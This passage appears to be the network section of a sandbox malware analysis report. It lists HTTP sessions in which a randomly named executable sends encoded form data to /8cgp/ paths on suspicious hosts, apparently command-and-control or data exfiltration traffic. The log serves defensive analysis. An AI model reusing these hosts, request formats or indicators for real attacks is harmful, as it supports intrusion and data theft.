                                                                    Apr 24, 2024 12:30:17.677617073 CEST2578OUTData Raw: 55 59 39 6a 67 51 45 68 4b 54 5a 4f 46 74 39 4a 51 52 4d 6e 33 53 59 63 6f 51 57 4f 35 49 64 59 57 67 44 34 61 6b 6e 4d 4d 48 75 5a 63 72 2f 56 6c 4a 4c 46 51 6f 6b 2f 6f 63 39 4a 36 6e 2f 4a 45 65 70 6f 55 47 6b 33 75 53 33 6b 44 6c 6d 6d 35 58
                                                                    Data Ascii: UY9jgQEhKTZOFt9JQRMn3SYcoQWO5IdYWgD4aknMMHuZcr/VlJLFQok/oc9J6n/JEepoUGk3uS3kDlmm5X1XdpRbkJWmMdp5kVCJdJJjBzA2UrkRSHiLWPqjsmCk40zljgbqWhr87rwomAHhwbybulHsbdJtNAOxqA9qwUEZk+Z9pwq5fOYC4vG2Lvbwer6+tmN6R/sJrqQTDdXrCsvKeWw8uH3k5MtJuys0wVaoPAOEHiZJJm+
                                                                    Apr 24, 2024 12:30:17.677809000 CEST7734OUTData Raw: 67 33 32 44 54 54 4d 68 35 44 67 46 77 78 45 73 54 79 55 75 4e 6b 69 65 44 35 36 73 71 6a 67 55 45 79 70 63 59 36 47 45 49 54 6e 36 49 44 4c 48 4a 4b 49 6f 66 52 56 66 57 63 56 69 4c 48 4d 68 73 78 34 41 55 58 45 79 6b 6d 6f 4d 51 47 73 58 77 66
                                                                    Data Ascii: g32DTTMh5DgFwxEsTyUuNkieD56sqjgUEypcY6GEITn6IDLHJKIofRVfWcViLHMhsx4AUXEykmoMQGsXwfAlCiDCxpVLrnBAE4ZNl7OnZU4kWmwotUSzUlDx8jhD7YUc7kanCz3rFzQTQFuCcTjekLUQXTBgP23g8wurPHz0fXmYuz9i/7XioTx+aco1sJzKJPB0VZs9t2TIEdGE2Jp3NOs7hkvs0UEp6dxsEgSj0HMoOPJmyfO
                                                                    Apr 24, 2024 12:30:17.677977085 CEST1856OUTData Raw: 37 72 2f 66 49 41 32 47 34 71 64 6d 6e 69 31 55 6b 48 75 47 30 36 6c 7a 5a 32 4e 30 34 76 4a 4d 73 4a 4f 39 6c 45 39 65 55 74 4f 47 31 4d 43 2f 75 61 6b 7a 34 79 4a 76 69 4f 42 57 56 4e 33 54 4e 65 48 34 6d 4a 73 70 73 76 4a 56 36 6c 33 43 6c 54
                                                                    Data Ascii: 7r/fIA2G4qdmni1UkHuG06lzZ2N04vJMsJO9lE9eUtOG1MC/uakz4yJviOBWVN3TNeH4mJspsvJV6l3ClTP+RBn5bfD3AkDbCftI2NpNeo0cirbXcQP3gDAlXu77ObcxPcpwdSW/m+T4P4TW/edbD6zBAiiuJgB2eA1YiMq1ViDWeU7yaLq2E5MxM+lg7u6KYHz7bttJoM+rz9DWnVoKE/TJY4z2EW6Iy/CYvimU/6DhB8mjBZA
                                                                    Apr 24, 2024 12:30:19.747643948 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:17 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 66 21 99 8c 64 e4 73 bf d3 f1 a7 0b cf 25 d7 64 62 ce 1d f7 56 f3 c3 a9 e6 4d 3b 37 73 37 0c 2c 2d 98 05 09 a2 d8 89 5d 72 f4 d1 9c 12 c9 f3 63 69 e2 2f 3c 5b 7a f9 62 d7 e8 76 0f a4 33 8e 44 7a 43 b1 1c 76 18 f4 66 ae 27 db a1 3f f6 e3 68 3b ed c7 f6 dc bc 51 9d 39 20 54 83 90 60 3f f7 5d 33 9c 92 6d a9 03 0d 53 be b7 6d 2f 42 80 09 89 ad d9 36 e3 7d bb 86 ed 66 4d 27 c0 40 a4 4d 7d 7f ea 12 33 70 22 cd f2 e7 a5 96 b2 e9 c6 24 f4 cc 18 b4 16 83 ee a0 20 08 5c c7 32 63 c7 f7 3a 61 14 7d 0f 02 82 2a ec e5 48 2e f5 5e 7a 19 9a bf 2d fc 03 e9 0d 21 76 5e da 51 ad b8 27 00 d9 91 9f 83 87 13 7f 3e 07 69 47 0f 60 c6 e2 4d f2 5c 45 56 e8 04 31 e7 83 9a ef 57 f3 ca 64 a5 60 21 9d bf 49 87 5b bf 9c bc 3e be 38 fe 45 fa 5b 67 f3 da f1 6c ff 5a bb bc 0e c8 dc ff ea 7c 22 71 0c d6 17 49 23 e9 4e 1e 9b 11 f9 1c ba f2 3e 67 e3 4b e7 4b 27 d2 ae 91 fa 97 0e b5 87 e8 0b f0 10 92 2f 1d da f8 4b a7 3b d0 74 ad f7 a5 b3 63 dc ec 18 5f 3a b2 22 03 03 d0 5e 0b bc 29 3c 44 57 d3 c7 e1 83 86 14 1b fc 3d 65 08 e1 13 3e fb 8b d0 22 f2 fe 9d 0c b6 0a f2 a6 cd 38 7e 8a 5e 28 b7 2f 9d eb 40 75 3c cb 5d d8 48 f1 6b 44 0b 68 5b 15 f4 49 a0 db da dc f1 b4 af d1 0f 57 24 1c 0d b5 81 66 c8 f7 f7 07 20 bc 2d e9 62 e6 44 d2 c4 71 89 04 7f cd 45 ec ab 53 e2 91 10 68 db 28 cf ad c9 c2 b3 50 ef 2d 47 f1 da 77 57 66 28 f9 4a a4 90 83 a4 5c b2 5a a4 7d 17 87 b7 b4 2e 1e dd 45 8b 00 c3 c6 05 89 e2 68 9f 28 b1 33 87 4f e6 3c d8 6f 79 e4 5a 7a 0d 88 db da 95 e9 2e c8 d9 a4 d5 be 3f 88 48 14 01 9a 4f b1 1f 82 c0 34 88 48 ef a0 db 2d 5f f9 fb a7 b3 0f 5a 14 87 a0 3e 67 72 db 8a db ed 7b 90 88 35 43 72 f7 f7 29 f9 a0 05 34 90 35 a2 59 d0 d5 f0 9c 58 71 4b 57 74 05 9e 4d 0f 2c 45 63 81 2a 7d 9c 11 67 3a 8b db 50 00 bd 76 2f 40 a1 ad 18 c0 f5 f6 01 eb 00 72 f9 d9 f1 e2 9e 71 1c 86 e6 6d 8b 68 53 e0 09 b5 09 bc 9b 4d 50 6b 36 00 b6 95 70 d4 5a 83 27 8f f2 a4 3c 15 37 ed 83 90 c4 8b d0 93 62 8d 80 11 dc b6 52 bd 82 f8 da 77 bc 92 8c 46 a3 f0 97 f8 d7 fb 76 26 e0 45
                                                                    Data Ascii: =ksF_ >R,;-,_n+N@`HXE?$$JleSLOwOEn>;SiC#7S?9MpFFrLn:F$}xy<9'#!F6r,Er<'vLW,%'\&MMf!ds%dbVM;7s7,-]rci/<[zbv3DzCvf'?h;Q9 T`?]3mSm/B6}fM'@M}3p"$ \2c:a}*H.^z-!v^Q'>iG`M\EV1Wd`!I[>8E[glZ|"qI#N>gKK'/K;tc_:"^)<DW=e>"8~^(/@u<]HkDh[IW$f -bDqESh(P-GwWf(J\Z}.Eh(3O<oyZz.?HO4H-_Z>gr{5Cr)45YXqKWtM,Ec*}g:Pv/@rqmhSMPk6pZ'<7bRwFv&E
                                                                    Apr 24, 2024 12:30:19.747764111 CEST1289INData Raw: 22 e0 e8 da 41 f1 03 b4 05 16 25 4f 5c 73 2a ef f3 86 88 46 fe b2 b0 77 7b 16 bc 4f 26 bd 2f 8b 09 d1 27 5f 16 86 ae db f0 3e 34 77 58 89 5c 0b 36 2e 80 b5 7f d8 ea ee 6f 15 d1 da 13 33 f7 b9 27 97 ab 18 92 1c 40 fb e5 cb ad 32 67 7d 78 1f f7 75
                                                                    Data Ascii: "A%O\s*Fw{O&/'_>4wX\6.o3'@2g}xux;F wJ=sR2xt\Om3,=>INds o0g?F?6O/#N #,!hgoBj+w4(qZ2df5a


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.11.205027367.225.140.26807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:19.957406044 CEST398OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:20.464931011 CEST512INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:30:20 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Location: http://ogunlewefamily.org.ng/8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak=
                                                                    Vary: User-Agent
                                                                    Content-Length: 0
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.11.2050274137.220.252.40807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:26.065649033 CEST656OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 37 35 4a 44 53 36 4c 78 51 67 2b 59 68 2b 4e 69 6f 34 46 61 31 74 57 6d 6a 33 36 36 52 72 2b 32 4e 42 5a 44 33 42 39 4e 33 6e 55 6d 4d 32 47 48 67 6f 56 35 6e 2b 70 73 6e 66 36 66 75 67 6c 6b 36 71 59 75 64 39 61 4e 4f 6e 44 4e 31 39 65 31 53 67 37 79 6e 51 42 58 61 2f 49 72 73 52 2b 4a 4a 30 48 73 43 41 79 55 52 68 53 78 42 49 75 41 68 4e 57 4d 75 45 66 34 70 59 58 44 73 6e 38 55 36 47 4e 78 4b 58 52 61 6d 59 62 2b 4f 4f 4d 44 6d 48 37 75 50 39 44 30 6b 6e 59 65 47 42 51 51 34 78 4a 62 4a 2b 66 4a 55 4b 58 75 4b 78 6f 52 5a 4d 41 70 75 51 50 35 4e 63 46 56 72 54 76 34 31 67 3d 3d
                                                                    Data Ascii: Xh9lX=75JDS6LxQg+Yh+Nio4Fa1tWmj366Rr+2NBZD3B9N3nUmM2GHgoV5n+psnf6fuglk6qYud9aNOnDN19e1Sg7ynQBXa/IrsR+JJ0HsCAyURhSxBIuAhNWMuEf4pYXDsn8U6GNxKXRamYb+OOMDmH7uP9D0knYeGBQQ4xJbJ+fJUKXuKxoRZMApuQP5NcFVrTv41g==
                                                                    Apr 24, 2024 12:30:26.334211111 CEST289INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.11.2050275137.220.252.40807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:28.857877970 CEST996OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 37 35 4a 44 53 36 4c 78 51 67 2b 59 6e 66 39 69 72 62 39 61 7a 4e 57 35 76 58 36 36 59 4c 2b 79 4e 42 56 44 33 46 6c 64 69 42 38 6d 4d 54 69 48 6e 70 56 35 6b 2b 70 73 74 2f 36 57 7a 77 6c 76 36 71 64 4e 64 35 53 4e 4f 6e 48 4e 30 50 6d 31 44 67 37 78 73 77 42 55 4e 50 49 6f 39 42 2b 54 4a 30 62 4b 43 42 6d 55 52 79 6d 78 41 4b 32 41 6c 59 71 4e 2f 55 66 79 76 59 58 41 33 58 38 53 36 47 52 35 4b 56 42 67 6e 72 48 2b 50 76 73 44 6c 48 37 74 46 4e 44 7a 6d 6e 5a 49 51 42 78 71 33 79 6c 2f 4a 39 66 7a 51 66 61 56 4b 77 34 43 57 74 73 68 35 77 62 57 4f 74 4a 48 34 67 47 44 6a 59 4b 6a 67 44 4f 42 4c 67 6b 62 43 59 53 39 75 77 73 78 77 7a 50 48 57 6f 68 47 36 49 6d 66 53 68 30 55 50 4e 4a 41 75 71 4d 4c 31 5a 33 71 48 34 7a 53 39 39 46 4b 67 2f 63 69 44 68 30 65 58 6b 74 48 4b 33 4e 6b 73 66 6f 39 42 4e 31 46 53 34 6c 4c 35 2f 38 30 48 79 46 58 68 41 6e 68 46 68 47 34 6d 6d 64 47 30 45 79 57 34 61 34 32 57 42 42 4c 64 49 38 68 73 63 34 2b 65 66 71 43 58 6a 62 5a 4a 6b 70 43 77 66 70 6a 78 66 66 32 45 4f 34 4b 38 79 4c 5a 6c 37 38 53 6c 70 42 61 44 2b 44 32 32 5a 42 70 34 36 37 7a 64 35 6c 56 2f 47 47 55 2b 36 48 2b 31 6b 74 71 56 4a 41 50 57 32 2b 55 79 76 51 55 5a 2f 2b 71 47 47 6d 73 44 69 58 52 65 32 4f 62 62 70 36 32 4b 56 53 63 69 78 34 49 74 66 73 64 55 78 4d 6b 71 5a 44 43 47 71 34 6a 79 4d 75 39 6f 70 70 38 67 4c 61 61 4f 48 34 38 56 42 70 39 41 50 4d 53 79 4a 4c 41 68 47 49 43 39 46 69 47 63 39 47 4f 6a 62 6a 35 67 54 53 62 76 2b 4a 53 4a 54 70 66 33 74 54 57 5a 59 70 48 44 6f 48 41 70 43 37 57 50 4b 4c 44 4d 7a 6a 34 43 45 4e 6b 77 39 36 4d 31 32 67 55 62 64 4b 75 39 68 51 3d
                                                                    Data Ascii: Xh9lX=75JDS6LxQg+Ynf9irb9azNW5vX66YL+yNBVD3FldiB8mMTiHnpV5k+pst/6Wzwlv6qdNd5SNOnHN0Pm1Dg7xswBUNPIo9B+TJ0bKCBmURymxAK2AlYqN/UfyvYXA3X8S6GR5KVBgnrH+PvsDlH7tFNDzmnZIQBxq3yl/J9fzQfaVKw4CWtsh5wbWOtJH4gGDjYKjgDOBLgkbCYS9uwsxwzPHWohG6ImfSh0UPNJAuqML1Z3qH4zS99FKg/ciDh0eXktHK3Nksfo9BN1FS4lL5/80HyFXhAnhFhG4mmdG0EyW4a42WBBLdI8hsc4+efqCXjbZJkpCwfpjxff2EO4K8yLZl78SlpBaD+D22ZBp467zd5lV/GGU+6H+1ktqVJAPW2+UyvQUZ/+qGGmsDiXRe2Obbp62KVScix4ItfsdUxMkqZDCGq4jyMu9opp8gLaaOH48VBp9APMSyJLAhGIC9FiGc9GOjbj5gTSbv+JSJTpf3tTWZYpHDoHApC7WPKLDMzj4CENkw96M12gUbdKu9hQ=
                                                                    Apr 24, 2024 12:30:29.126777887 CEST289INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.11.2050276137.220.252.40807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:31.662067890 CEST1289OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 37 35 4a 44 53 36 4c 78 51 67 2b 59 6e 66 39 69 72 62 39 61 7a 4e 57 35 76 58 36 36 59 4c 2b 79 4e 42 56 44 33 46 6c 64 69 42 45 6d 4d 6c 75 48 6e 4b 74 35 6c 2b 70 73 68 66 36 54 7a 77 6c 32 36 75 4a 52 64 35 58 34 4f 6b 76 4e 7a 63 75 31 43 56 58 78 70 77 42 5a 54 66 49 71 73 52 2b 48 4a 30 48 6b 43 42 79 71 52 68 36 78 42 49 65 41 69 72 43 4d 33 6b 66 34 76 59 58 4d 6d 48 39 76 36 47 46 70 4b 56 4e 67 6e 70 44 2b 4f 64 6b 44 6b 55 44 74 43 64 44 77 76 48 5a 54 43 42 77 61 33 79 42 72 4a 39 66 38 51 62 4b 56 4b 7a 41 43 52 75 45 69 35 51 62 57 43 4e 4a 47 75 67 36 48 6a 59 47 37 67 44 53 42 4c 67 63 62 43 34 53 39 72 52 73 79 33 54 50 42 41 59 67 65 2b 49 61 48 53 68 68 6c 50 4d 64 41 70 61 49 4c 6e 62 66 71 43 5a 7a 53 2f 64 46 49 73 76 63 78 4d 42 30 34 58 67 4a 31 4b 7a 42 30 73 59 51 39 42 74 56 46 5a 39 5a 45 39 66 38 36 61 43 45 54 6c 41 6a 54 46 68 57 6b 6d 6d 64 76 30 46 32 57 34 50 77 32 52 45 31 49 51 34 38 6d 34 73 34 76 51 2f 32 79 58 6a 76 72 4a 6e 35 6f 77 65 68 6a 33 2f 66 32 42 70 4d 4c 79 43 4c 65 36 4c 38 41 71 4a 41 59 44 2b 66 63 32 5a 6f 53 34 72 48 7a 63 4a 31 56 31 32 47 58 30 36 48 79 36 45 74 73 43 5a 41 50 57 32 69 41 79 76 4d 55 59 4b 53 71 55 42 43 73 53 52 2f 52 59 32 4f 5a 62 70 36 64 4b 56 66 69 69 78 78 72 74 66 39 4b 55 33 38 6b 74 4d 72 43 48 72 34 6b 6e 73 75 34 2b 5a 70 76 2f 62 58 4d 4f 47 55 4f 56 42 59 41 42 38 49 53 7a 4a 62 41 77 57 49 4e 73 56 69 42 56 64 47 55 6f 37 2f 74 67 51 6d 68 76 2b 55 5a 4a 52 35 66 36 70 71 37 4b 35 64 39 66 71 4f 4f 69 78 37 76 4d 63 6e 77 4d 54 66 76 4a 56 68 74 32 6f 4f 4b 36 33 73 42 44 4d 43 4d 35 6e 54 41 36 5a 70 6f 42 67 45 72 53 70 37 4c 32 39 55 4e 37 67 30 57 76 6f 54 2f 7a 61 76 62 63 2b 59 76 74 44 58 79 47 74 74 41 72 58 66 6d 58 4c 74 34 68 70 6b 34 37 36 32 4a 38 53 76 4d 68 56 58 4b 46 79 62 4b 78 59 4d 63 76 50 49 57 57 4c 57 43 7a 76 73 51 36 2b 63 77 79 71 78 30 30 4e 53 33 58 66 62 70 66 56 48 48 69 6f 31 46 79 49 71 59 52 37 6d 5a 67 76 69 7a 75 38 70 4d 37 65 6b 4a 71 57 4c 76 59 32 59 6a 4f 53 69 6a 72 74 54 35 75 73 63 4f 7a 54 4c 77 64 6a 76 5a 51 7a 69 76 65 69 4f 42 71 57 4f 2b 56 4d 6f 70 77 47 37 70 6a 61 48 44 61 51 73 37 35 4b 37 69 4d 68 59 61 35 67 79 2b 4b 2b 5a 33 37 69 6c 58 57 71 58 33 55 68 39 37 53 50 30 41 48 46 53 7a 4c 70 57 55 4c 35 4b 32 59 6f 46 53 64 5a 4d 53 46 41 5a 48 34 6e 2b 4b 57 78 6f 44 7a 75 6a 49 31 55 55 4f 6a 45 7a 6e 4c 76 4b 4e 65 75 75 64 39 59 70 53 34 6a 53 79 63 74 75 48 49 36 63 6a 72 78 68 31 37 6c 7a
                                                                    Data Ascii: Xh9lX=75JDS6LxQg+Ynf9irb9azNW5vX66YL+yNBVD3FldiBEmMluHnKt5l+pshf6Tzwl26uJRd5X4OkvNzcu1CVXxpwBZTfIqsR+HJ0HkCByqRh6xBIeAirCM3kf4vYXMmH9v6GFpKVNgnpD+OdkDkUDtCdDwvHZTCBwa3yBrJ9f8QbKVKzACRuEi5QbWCNJGug6HjYG7gDSBLgcbC4S9rRsy3TPBAYge+IaHShhlPMdApaILnbfqCZzS/dFIsvcxMB04XgJ1KzB0sYQ9BtVFZ9ZE9f86aCETlAjTFhWkmmdv0F2W4Pw2RE1IQ48m4s4vQ/2yXjvrJn5owehj3/f2BpMLyCLe6L8AqJAYD+fc2ZoS4rHzcJ1V12GX06Hy6EtsCZAPW2iAyvMUYKSqUBCsSR/RY2OZbp6dKVfiixxrtf9KU38ktMrCHr4knsu4+Zpv/bXMOGUOVBYAB8ISzJbAwWINsViBVdGUo7/tgQmhv+UZJR5f6pq7K5d9fqOOix7vMcnwMTfvJVht2oOK63sBDMCM5nTA6ZpoBgErSp7L29UN7g0WvoT/zavbc+YvtDXyGttArXfmXLt4hpk4762J8SvMhVXKFybKxYMcvPIWWLWCzvsQ6+cwyqx00NS3XfbpfVHHio1FyIqYR7mZgvizu8pM7ekJqWLvY2YjOSijrtT5uscOzTLwdjvZQziveiOBqWO+VMopwG7pjaHDaQs75K7iMhYa5gy+K+Z37ilXWqX3Uh97SP0AHFSzLpWUL5K2YoFSdZMSFAZH4n+KWxoDzujI1UUOjEznLvKNeuud9YpS4jSyctuHI6cjrxh17lz
                                                                    Apr 24, 2024 12:30:31.662153959 CEST11601OUTData Raw: 4a 6a 47 70 47 42 52 67 55 74 6a 72 56 76 4e 6b 65 4a 6d 63 47 39 56 36 51 2f 55 42 41 70 68 48 6b 33 44 45 50 48 6e 33 6f 32 33 48 48 79 6e 79 54 54 61 39 49 30 69 78 6e 56 45 44 79 73 58 2b 61 75 78 54 37 45 4d 66 50 69 46 37 2f 53 58 2b 49 7a
                                                                    Data Ascii: JjGpGBRgUtjrVvNkeJmcG9V6Q/UBAphHk3DEPHn3o23HHynyTTa9I0ixnVEDysX+auxT7EMfPiF7/SX+IznZjpR3HV3a+9Bg449qC1Bq6xQQNyZ8e2dOesYXb91YCZ0pYmka1/H3FwWPXSEt+IqGRNmN8H17pJ+mGNGFglcdLYZHWXD138+nLUdtvY6LhgThkBZGXw4Cz+OD4cebY6/BoPbms6DeET5mu6KpRXpgJ5RFP8WRQET
                                                                    Apr 24, 2024 12:30:31.937854052 CEST289INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                    Apr 24, 2024 12:30:31.937905073 CEST1289OUTData Raw: 32 65 78 59 74 41 65 48 63 6b 78 73 6e 69 6e 79 6c 71 30 48 58 34 55 6b 67 50 56 75 42 48 61 6a 46 30 4d 46 58 57 6b 64 50 58 2f 66 68 75 63 6f 6e 44 72 56 72 55 39 54 67 4f 71 48 57 37 61 73 35 70 50 38 71 62 6f 4b 55 46 58 42 56 62 56 2f 7a 4b
                                                                    Data Ascii: 2exYtAeHckxsninylq0HX4UkgPVuBHajF0MFXWkdPX/fhuconDrVrU9TgOqHW7as5pP8qboKUFXBVbV/zKtA0u56I3HDKkA1+faqq738nw4AFr0iWW+OCwUGoPEFqZ67LNKqOrwVDZ+zScc7QeFjGskRXJJQxg2HMtgdWF7+/M8DmyyDTgAYnqRsxPKyGoE0/bO3o6nXoHo5J9qeKDFB3oh5GgzmLWII0j/jeLEdy9yr0q7kpOs
                                                                    Apr 24, 2024 12:30:31.937963963 CEST6445OUTData Raw: 43 6a 65 7a 7a 77 50 57 6f 67 2b 4e 6b 78 63 38 50 6c 55 30 4c 36 78 51 4a 61 47 42 78 66 4b 64 45 5a 57 59 52 41 6e 41 47 6e 6a 32 6f 72 73 63 6a 74 65 4e 71 66 38 75 6e 78 6b 74 42 51 51 46 50 2f 63 41 59 76 69 44 64 54 5a 59 69 63 39 52 4f 52
